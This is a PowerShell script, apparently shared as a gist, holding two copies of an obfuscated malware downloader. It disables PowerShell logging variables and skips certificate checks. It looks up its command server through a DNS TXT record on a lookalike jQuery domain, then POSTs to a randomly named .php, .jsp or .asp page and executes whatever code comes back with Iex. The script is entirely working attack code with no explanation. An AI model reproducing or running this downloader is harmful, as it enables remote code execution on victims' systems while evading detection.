JohnHammond/dns_pulldown.ps1

## dns_pulldown.ps1
0..4|%{try
{
    $LogEngineLifeCycleEvent=$LogEngineHealthEvent=$LogProviderLifecycleEvent=$LogProviderHealthEvent=$False;
    $u=[System.Text.Encoding]::UTF8;
    sAl er Get-Random;
    $l=[System.Net.WebRequest];
    sAL no New-Object;
    $g=[SysTEm.Net.SeRvICePoIntMAnaGEr];
    $g::Expect100ConTINuE=0;
    $g::ServerCertificateValidationCallback={1};
    $j={$t=$args; [string](0..$t[0]|%{[char][int]([int][char]('&')+($t[1]).substring(($_*$t[2]),$t[2]))})-replace' '};
    $b= $u.GetBytes('ssd');
    if($PSVersionTable.PSVersion.Major -gt 4){$g::SecurityProtocol="$(. $j 14 '7870771112 67870771111 6787077' 2)";
    $c=$(. $j 7 '667878747720 9 9' 2)+$($t={$u.GetString([System.Convert]::FromBase64String($args[0]))};
    # https://dns.google.com/resolve?name=dmarc.jqueryupdatejs.com&type=Txt
    (nO System.Net.Webclient).DownloadString($(& $j 68 '667878747720 9 9627277 8657373657063 8617371 9766377737080632572597163236271597661 86875796376837974625978636877 8617371 07883746323468278' 2))|%{($_[$_.IndexOf([char](47))..$_.IndexOf([char](43))]-join'').split([char](47))[($(3,5)|Er)]+$(-join(0..1|%{[char](61)}))}|%{(. $t $_)}|%{(. $t $_)})+[char](47)+$(-join(1..$(@(8,6,7)|ER)|%{[char][int]((65..90)+(97..122)|ER)})).ToLower()+[char](46)+$(@('php','jsp','asp')|ER)}else{$c="$(. $j 17 '667878747720 9 911141814121318161713' 2)"+[char](47)+$(-join(1..$(@(8,6,7)|eR)|%{[char][int]((65..90)+(97..122)|ER)})).ToLower()+[char](46)+$(@('php','jsp','asp')|ER)};
    [System.Net.HttpWebRequest] $w=$l::Create($c);
    $w.Proxy=$l::GetSystemWebProxy();
    $w.Proxy.Credentials=[System.Net.CredentialCache]::DefaultCredentials;
    $w.Timeout=60000;
    $w.Method='POST';
    $w.ContentType=$(& $j 14 '5974747067615978677372 9827170' 2);
    $w.ContentLength=$b.Length;
    $r=$w.GetRequestStream();
    $r.Write($b, 0, $b.Length);
    $r.Flush();
    $r.Close();
    [System.Net.HttpWebResponse] $wr=$w.GetResponse();
    $sr=NO System.IO.StreamReader($wr.GetResponseStream());
    [CHAr[]]$ri = ([cHAr[]]($sr.ReadToEnd()));
    $wr.Close();
    Iex ($ri -JOIn'');
}catch {sleEP -s $(@(5,16,17)|ER);
        $_.Exception.Message|oUt-NUll}
}
	0..4\|%{try
	{
	$LogEngineLifeCycleEvent=$LogEngineHealthEvent=$LogProviderLifecycleEvent=$LogProviderHealthEvent=$False;
	$u=[System.Text.Encoding]::UTF8;
	sAl er Get-Random;
	$l=[System.Net.WebRequest];
	sAL no New-Object;
	$g=[SysTEm.Net.SeRvICePoIntMAnaGEr];
	$g::Expect100ConTINuE=0;
	$g::ServerCertificateValidationCallback={1};
	$j={$t=$args; [string](0..$t[0]\|%{[char][int]([int][char]('&')+($t[1]).substring(($_*$t[2]),$t[2]))})-replace' '};
	$b= $u.GetBytes('ssd');
	if($PSVersionTable.PSVersion.Major -gt 4){$g::SecurityProtocol="$(. $j 14 '7870771112 67870771111 6787077' 2)";
	$c=$(. $j 7 '667878747720 9 9' 2)+$($t={$u.GetString([System.Convert]::FromBase64String($args[0]))};
	# https://dns.google.com/resolve?name=dmarc.jqueryupdatejs.com&type=Txt
	(nO System.Net.Webclient).DownloadString($(& $j 68 '667878747720 9 9627277 8657373657063 8617371 9766377737080632572597163236271597661 86875796376837974625978636877 8617371 07883746323468278' 2))\|%{($_[$_.IndexOf([char](47))..$_.IndexOf([char](43))]-join'').split([char](47))[($(3,5)\|Er)]+$(-join(0..1\|%{[char](61)}))}\|%{(. $t $_)}\|%{(. $t $_)})+[char](47)+$(-join(1..$(@(8,6,7)\|ER)\|%{[char][int]((65..90)+(97..122)\|ER)})).ToLower()+[char](46)+$(@('php','jsp','asp')\|ER)}else{$c="$(. $j 17 '667878747720 9 911141814121318161713' 2)"+[char](47)+$(-join(1..$(@(8,6,7)\|eR)\|%{[char][int]((65..90)+(97..122)\|ER)})).ToLower()+[char](46)+$(@('php','jsp','asp')\|ER)};
	[System.Net.HttpWebRequest] $w=$l::Create($c);
	$w.Proxy=$l::GetSystemWebProxy();
	$w.Proxy.Credentials=[System.Net.CredentialCache]::DefaultCredentials;
	$w.Timeout=60000;
	$w.Method='POST';
	$w.ContentType=$(& $j 14 '5974747067615978677372 9827170' 2);
	$w.ContentLength=$b.Length;
	$r=$w.GetRequestStream();
	$r.Write($b, 0, $b.Length);
	$r.Flush();
	$r.Close();
	[System.Net.HttpWebResponse] $wr=$w.GetResponse();
	$sr=NO System.IO.StreamReader($wr.GetResponseStream());
	[CHAr[]]$ri = ([cHAr[]]($sr.ReadToEnd()));
	$wr.Close();
	Iex ($ri -JOIn'');
	}catch {sleEP -s $(@(5,16,17)\|ER);
	$_.Exception.Message\|oUt-NUll}
	}